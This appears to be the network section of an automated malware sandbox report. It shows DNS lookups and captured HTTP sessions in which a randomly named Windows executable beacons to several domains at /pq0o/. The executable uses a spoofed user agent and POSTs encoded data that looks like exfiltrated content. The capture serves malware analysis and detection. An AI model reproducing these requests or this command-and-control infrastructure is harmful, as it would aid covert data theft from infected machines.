Apr 24, 2024 09:22:09.912441969 CEST	1.1.1.1	192.168.2.4	0x3b77	No error (0)	www.unchainedventure.com	unchainedventure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:22:09.912441969 CEST	1.1.1.1	192.168.2.4	0x3b77	No error (0)	unchainedventure.com		195.242.88.141	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:24.820734024 CEST	1.1.1.1	192.168.2.4	0xbb4	No error (0)	www.klconstructions.net		74.208.236.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:38.808690071 CEST	1.1.1.1	192.168.2.4	0xee5d	No error (0)	www.kakaobrain.us	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:22:38.808690071 CEST	1.1.1.1	192.168.2.4	0xee5d	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:54.333777905 CEST	1.1.1.1	192.168.2.4	0x4e43	No error (0)	www.celebration24.co.uk		103.168.172.37	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:54.333777905 CEST	1.1.1.1	192.168.2.4	0x4e43	No error (0)	www.celebration24.co.uk		103.168.172.52	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:08.805236101 CEST	1.1.1.1	192.168.2.4	0xf194	No error (0)	www.holein1sa.com		213.171.195.105	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:23.301265001 CEST	1.1.1.1	192.168.2.4	0x2822	No error (0)	www.shun-yamagata.com		162.43.104.164	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:37.714562893 CEST	1.1.1.1	192.168.2.4	0xe60b	No error (0)	www.carsinmultan.com	carsinmultan.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:23:37.714562893 CEST	1.1.1.1	192.168.2.4	0xe60b	No error (0)	carsinmultan.com		84.32.84.32	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:51.304563999 CEST	1.1.1.1	192.168.2.4	0xdd1e	No error (0)	www.threesomeapps.com	threesomeapps.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:23:51.304563999 CEST	1.1.1.1	192.168.2.4	0xdd1e	No error (0)	threesomeapps.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:51.304563999 CEST	1.1.1.1	192.168.2.4	0xdd1e	No error (0)	threesomeapps.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:24:04.947500944 CEST	1.1.1.1	192.168.2.4	0x8191	Name error (3)	www.jrksa.info	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.xn--yzyp76d.com

www.luckydomainz.shop

www.cd14j.us

www.happymarts.top

www.unchainedventure.com

www.klconstructions.net

www.kakaobrain.us

www.celebration24.co.uk

www.holein1sa.com

www.shun-yamagata.com

www.carsinmultan.com

www.threesomeapps.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	47.76.62.167	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:00.643338919 CEST	361	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=J8WC84xruYdLZ+87Afe3OqqbMOMBhnRcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTXSJ8T31vhIsUx1l9uwIaTYdZUjGlsKsX5ww= HTTP/1.1 Host: www.xn--yzyp76d.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:21:00.981015921 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:21:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 3c 74 69 74 6c 65 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 72 6b 73 6d 69 6c 65 2e 63 6f 6d 2f 61 73 73 65 74 2f 6c 70 5f 73 74 79 6c 65 2e 63 73 73 22 20 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 33 36 35 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 66 69 6c 65 2f 6d 61 69 6c 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 61 75 74 6f 22 20 61 6c 74 3d 22 33 36 35 e9 82 ae e7 ae b1 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 20 31 3b 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6d 22 20 3e 3c 68 32 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e e9 95 bf e7 9b 9b 2e 63 6f 6d 3c 2f 68 32 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 2f 2f 63 6f 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 22 3e 0a 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 0a 3c 74 72 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e e5 9f 9f e5 90 8d e6 89 98 e7 ae a1 e5 95 86 3a 3c 69 6d 67 20 73 72 63 3d 22 66 69 6c 65 2f 6d 61 72 6b 73 6d 69 6c 65 20 31 2e 70 6e 67 22 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 61 6c 74 3d 22 e5 90 8d e5 95 86 e7 bd 91 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 37 70 78 3b 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 20 72 6f 77 73 70 61 6e 3d 22 34 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 65 63 68 61 74 22 3e e5 be ae e4 bf a1 e5 ae a2 e6 9c Data Ascii: d49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width"><title>.com</title> <link rel="stylesheet" href="http://www.marksmile.com/asset/lp_style.css" ></head><body><div class="main"><a href="https://mail.365.com/login.html" target="_blank"><img src="/file/mail.png" width="100%" height="auto" alt="365" style="position: absolute;top:0;left:0;z-index: 1;"></a><div class="dm" ><h2 id="domain">.com</h2></div><div class="bg"><div class="a"></div><div class="b"></div><div class="c"></div><div class="d"></div></div>...//co--><div class="co"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr><td align="left">:<img src="file/marksmile 1.png" width="76" height="20" alt="" style="position: absolute;margin-left: 7px;" /></td><td align="right" rowspan="4"><div class="wechat">
Apr 24, 2024 09:21:00.981090069 CEST	1289	IN	Data Raw: 8d 3a 3c 65 6d 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 22 3e ef bc 88 e8 af b7 e5 a4 87 e6 b3 a8 e5 9f 9f e5 90 Data Ascii: :<em style="display: block;font-size: 10px;font-style: normal;"></em><img class="wcode" width="60" height="60" src="http://www.marksmile.com/asset/lp_qrcode.png" id="myImage" /></div></td></tr><tr><td align="left"><div c
Apr 24, 2024 09:21:00.981128931 CEST	1018	IN	Data Raw: 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 69 6d 61 67 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 Data Ascii: e="application/javascript"></script><script> var image = document.getElementById("myImage"); // // function createEnlargedContainer() { var container = document.createElement('div
Apr 24, 2024 09:21:00.981167078 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:16.693301916 CEST	629	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 37 67 35 74 74 43 52 6a 56 47 79 7a 44 62 48 34 68 5a 45 42 31 75 76 37 4b 46 38 77 45 48 77 49 41 72 6a 4f 6b 2b 34 69 2f 49 77 6f 39 46 56 44 65 30 37 51 2b 32 7a 70 63 6c 43 64 43 4a 74 46 57 37 6f 37 75 43 42 2f 4e 46 43 53 56 35 44 77 62 31 78 53 78 4c 56 65 52 65 4d 5a 30 64 41 79 32 5a 4f 51 51 4d 46 4b 73 68 6e 69 64 4d 78 6e 66 48 4b 78 50 64 49 4f 6b 47 30 4e 74 32 2f 6c 30 59 63 2f 59 38 4e 4f 4b 6e 49 46 61 51 51 38 2f 5a 71 42 35 49 6c 6e 6d 32 2b 74 66 68 46 46 35 7a 74 59 33 31 63 35 35 52 7a 78 41 4e 4c 53 63 39 6c 5a 6c 51 3d 3d Data Ascii: F49hs=+nAeGzWYuwF/7g5ttCRjVGyzDbH4hZEB1uv7KF8wEHwIArjOk+4i/Iwo9FVDe07Q+2zpclCdCJtFW7o7uCB/NFCSV5Dwb1xSxLVeReMZ0dAy2ZOQQMFKshnidMxnfHKxPdIOkG0Nt2/l0Yc/Y8NOKnIFaQQ8/ZqB5Ilnm2+tfhFF5ztY31c55RzxANLSc9lZlQ==
Apr 24, 2024 09:21:17.001425982 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:16 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:19.526483059 CEST	649	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 36 41 70 74 72 68 35 6a 65 47 79 30 66 4c 48 34 37 70 45 46 31 75 54 37 4b 45 34 47 45 30 45 49 4f 76 6e 4f 32 36 6b 69 7a 6f 77 6f 79 6c 56 47 54 55 37 74 2b 78 37 4c 63 67 69 64 43 50 42 46 57 36 59 37 75 78 5a 38 4c 56 43 55 4d 70 44 79 55 56 78 53 78 4c 56 65 52 65 4a 43 30 65 77 79 32 4a 2b 51 52 70 78 4a 6c 42 6e 68 58 73 78 6e 56 6e 4b 31 50 64 49 6f 6b 44 73 72 74 30 33 6c 30 5a 73 2f 4a 49 5a 4e 45 6e 49 48 57 41 52 43 31 37 37 57 67 72 45 67 75 6e 72 4f 51 46 56 59 38 31 38 43 6d 45 39 75 72 52 58 43 64 4b 43 6d 52 2b 59 51 2b 61 56 63 75 74 65 2f 71 44 67 4b 2f 50 51 33 64 59 47 77 64 2f 41 3d Data Ascii: F49hs=+nAeGzWYuwF/6Aptrh5jeGy0fLH47pEF1uT7KE4GE0EIOvnO26kizowoylVGTU7t+x7LcgidCPBFW6Y7uxZ8LVCUMpDyUVxSxLVeReJC0ewy2J+QRpxJlBnhXsxnVnK1PdIokDsrt03l0Zs/JIZNEnIHWARC177WgrEgunrOQFVY818CmE9urRXCdKCmR+YQ+aVcute/qDgK/PQ3dYGwd/A=
Apr 24, 2024 09:21:19.836370945 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:19 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:22.370654106 CEST	10731	OUT	POST /pq0o/ HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.luckydomainz.shop Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.luckydomainz.shop/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 6e 41 65 47 7a 57 59 75 77 46 2f 36 41 70 74 72 68 35 6a 65 47 79 30 66 4c 48 34 37 70 45 46 31 75 54 37 4b 45 34 47 45 31 38 49 4f 63 76 4f 31 62 6b 69 39 49 77 6f 73 56 56 48 54 55 37 38 2b 77 66 50 63 67 6e 71 43 4b 64 46 58 63 6b 37 35 51 5a 38 46 56 43 55 52 35 44 2f 62 31 77 53 78 4c 46 43 52 65 5a 43 30 65 77 79 32 50 53 51 42 4d 46 4a 6a 42 6e 69 64 4d 78 72 66 48 4b 4e 50 5a 63 57 6b 43 59 37 74 46 58 6c 30 35 38 2f 4c 64 4e 4e 62 33 49 2f 56 41 52 4b 31 37 32 52 67 72 6f 64 75 6e 65 68 51 43 6c 59 38 77 78 6f 37 33 56 43 36 57 37 45 4e 59 75 4f 61 5a 6b 31 32 49 56 59 68 50 33 6c 31 43 6f 49 37 50 64 6e 47 59 36 78 49 4b 43 53 69 51 47 55 2f 55 55 6b 64 65 6b 6c 4e 70 52 6c 65 64 54 34 74 44 64 41 36 31 42 56 65 46 6e 4c 68 67 4e 35 61 41 70 75 71 36 76 74 42 53 66 6f 54 44 33 44 6c 2b 35 74 62 5a 47 51 59 61 34 50 6a 6d 68 78 48 69 51 42 44 76 6c 6a 68 71 44 57 38 77 41 66 33 72 71 33 6a 62 2f 2f 49 71 37 43 38 55 4e 75 37 6b 6c 62 66 43 45 49 4d 47 75 65 76 64 33 4c 5a 75 7a 33 43 56 62 38 52 48 46 49 4d 76 62 6b 6f 67 74 6a 73 74 47 36 48 39 39 2b 75 58 4f 46 49 77 54 51 6a 52 2f 44 65 54 46 75 55 6a 51 7a 5a 30 71 79 45 61 55 72 41 61 50 4f 6e 4f 71 59 52 50 6d 63 65 4d 6f 37 79 64 6e 67 65 4c 4c 50 4d 79 45 44 39 74 41 4a 6b 54 6e 48 64 6d 4c 54 57 49 6c 4e 6a 4f 34 43 72 30 44 74 79 70 69 64 36 4d 4b 62 34 49 57 4f 41 6f 67 4c 37 71 6c 69 31 61 61 33 53 4e 4f 4f 6a 68 64 6f 59 4e 47 6e 36 51 77 54 6f 56 58 54 63 77 75 6b 6c 6d 76 38 64 50 7a 62 72 6e 6f 75 75 6d 4f 66 75 6a 37 56 7a 39 50 77 7a 50 31 48 4c 66 43 77 36 43 71 66 2f 63 68 70 41 68 32 37 70 64 6d 49 63 42 57 72 51 79 35 47 31 4b 52 4c 6b 62 6c 75 39 69 6c 74 42 43 38 64 6f 70 7a 33 42 4f 70 79 65 61 4f 35 45 6a 53 49 41 43 33 62 79 6d 51 47 5a 6e 75 2b 75 75 48 78 4b 50 2b 59 6c 35 79 4b 45 70 4f 72 72 6b 66 36 68 46 6f 59 4b 69 79 43 6a 78 6f 49 43 6e 4c 42 61 57 4b 76 47 30 45 30 7a 53 71 74 34 31 79 35 77 47 77 51 34 38 77 65 56 51 49 68 58 4a 64 70 42 4a 78 66 68 41 2f 78 58 69 72 49 46 32 50 74 39 4a 75 67 62 39 42 43 50 53 66 54 6b 5a 52 67 58 6b 47 67 35 6c 55 49 44 37 6e 4c 5a 4e 5a 55 46 73 42 35 48 70 30 31 30 45 70 44 41 33 35 55 66 2f 30 67 73 68 4b 35 65 30 6e 71 49 64 2b 57 70 4e 76 6e 6f 65 45 79 73 34 70 47 73 69 34 41 73 71 37 36 36 32 73 4a 45 4f 71 33 6c 6e 4b 59 59 37 6b 4b 6f 61 62 79 6c 42 62 33 66 33 68 4e 74 6f 59 76 56 30 76 6f 71 71 39 64 6f 49 57 58 51 61 45 31 64 55 38 55 44 4f 36 62 61 7a 72 70 45 2b 31 4d 71 37 48 59 43 65 61 4a 50 39 7a 4e 4d 33 34 49 30 2b 6f 75 32 77 52 48 36 37 44 39 74 64 71 74 56 36 56 42 33 5a 34 46 70 49 68 58 58 56 32 47 39 70 71 79 67 57 4e 30 6a 68 73 53 6f 52 31 70 2b 4d 78 4c 77 55 33 43 68 41 42 78 63 51 6c 34 56 6e 57 46 6d 6f 68 56 37 62 73 4b 4f 77 4d 4f 71 39 77 32 70 57 4a 78 36 42 4d 2b 36 2f 2b 45 4a 42 6a 67 46 39 51 2f 72 6e 2b 6d 73 48 36 39 39 63 77 35 78 43 6e 33 51 74 48 67 46 30 31 4c 37 7a 67 72 32 2b 43 4a 52 6b 73 41 35 31 52 31 52 32 65 66 4d 47 38 71 56 4f 50 63 4c 74 73 70 46 58 6c 43 31 4e 63 37 45 62 37 42 68 53 74 4c 73 6b 74 6a 4c 7a 67 72 44 4e 6d 7a 41 54 2f 68 35 36 2b 35 5a 36 5a 55 6e 37 65 53 70 69 51 62 38 30 53 34 79 50 56 58 76 30 4a 62 51 66 4b 55 6e 76 75 76 54 48 65 53 52 64 4a 4e 44 30 53 7a 47 49 51 55 64 7a 6d 78 54 33 68 68 49 37 6b 54 55 39 41 77 57 48 50 47 6d 4f 30 54 52 71 67 45 76 79 46 66 51 2f 69 4e 34 7a 64 47 64 70 4f 43 57 6a 6a 37 35 79 52 79 45 53 51 2b 41 2f 45 55 30 4a 79 59 72 51 65 6d 67 59 4c 63 43 45 58 51 51 63 34 2b 44 6b 50 50 50 4b 42 77 44 43 62 4c 79 50 75 62 48 65 55 32 4d 35 77 75 47 52 70 50 39 39 53 73 4c 62 6f 71 77 31 36 76 79 4a 32 72 6c 4a 72 4e 41 4d 69 75 48 64 57 38 53 49 43 73 47 30 31 6c 35 6b 64 2f 71 4b 35 39 74 70 46 4e 65 41 35 57 7a 2f 63 42 76 77 57 7a 55 74 68 42 44 6f 4c 75 48 52 57 77 72 7a 63 47 65 54 5a 74 72 79 2f 4f 74 42 69 72 57 4c 4b 6e 45 77 4a 74 64 4e 4c 34 77 4b 6e 6f 52 30 58 6f 66 6f 7a 6a 58 2f 32 49 59 4f 35 4d 7a 64 65 61 30 78 73 44 2f 76 39 38 39 42 39 6f 5a 67 6a 71 74 56 76 58 6d 2f 36 64 4b 61 72 45 77 45 32 2f 58 55 2f 51 4d 6e 55 69 37 77 59 77 37 Data Ascii: 